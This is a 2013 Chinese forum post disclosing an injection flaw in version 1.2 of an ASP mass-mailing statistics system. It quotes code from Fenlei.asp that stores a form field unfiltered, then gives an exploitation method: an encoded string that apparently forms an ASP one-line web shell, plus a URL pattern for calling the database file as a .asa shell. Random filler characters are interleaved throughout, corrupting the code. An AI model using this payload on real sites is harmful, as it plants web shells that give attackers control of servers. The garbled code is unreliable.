找回密码
 立即注册
查看: 2837|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
/ z& Z, V  q( b1 J/ D+ a
3 D3 `/ {8 m2 A2 [+ XIF Request.QueryString("Action")="del" Then 1 F: T$ C  ^. b3 ^$ H
ID=Request.QueryString("ID")
6 ^# T, [- `4 ^+ `1 p; f; e+ P7 |IF Countss ("tui","Fenlei",ID )<>0 then 4 e7 S0 o' m" q1 a4 A: U
'略 % \& r' U7 X; o5 P2 {+ G
IF Request.QueryString("Action")="Add" Then
* c& ~. o, w+ t: N+ i$ E! F. fTname=Request.Form("Typename") 8 E/ s. u% r, ?& C  T
Set Rs=Server.CreateObject("adodb.Recordset")
( @& Y, [& C! z  J+ B/ _Sql="Select * From Fenlei Order by id Desc "
% _* V9 h% G$ x& hRs.Open Sql,Conn,1,3 / U, M! b- F5 _
Rs.Addnew
* D- K2 u/ b5 [. ?0 ?Rs("Typename")=Tname
% j/ X1 `' A$ }'略
5 U! P) k. B2 f  w5 c# ySet Rs=Server.CreateObject("adodb.Recordset")
2 J- ~& u+ W) M% d$ F7 KSql="Select * From Fenlei Order by id Desc " ' A/ x9 T1 E, Y$ ^5 M
Rs.Open Sql,Conn,1,1
* v  C+ T- S4 A( z'略
! {) _$ f: q! j2 g%>: l: C: |- q) D# O' m
$ e; d9 r. m" v) e3 {& ~

: s' @8 x0 ?$ P( q, a% n. j
- J# Q) L" J. j( Q) f2 V( o没有过滤,直接写入数据库。
; c+ {3 P: {3 {: |2 d8 Q& ^9 z
- v( h5 R, Y7 A. ]9 n  a9 s: a利用方法:
. _0 n1 n& f+ h& _
; _* W# C, f% N1 Q, R) {" [6 F: J插入:┼攠數畣整爠煥敵瑳∨≡┩>( z9 r( q0 W4 E8 ?- ?9 {: O

9 V0 b1 O- e6 ]# T
5 v  M7 y  C: S6 a+ o( L连接: http://www.xxx.com/###tongbaner.asa
7 i9 e+ t* N! e& u'默认安装文件: ( ~$ v; Y% V4 S- _
'install.asp
3 \6 _1 Y! `7 K. t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表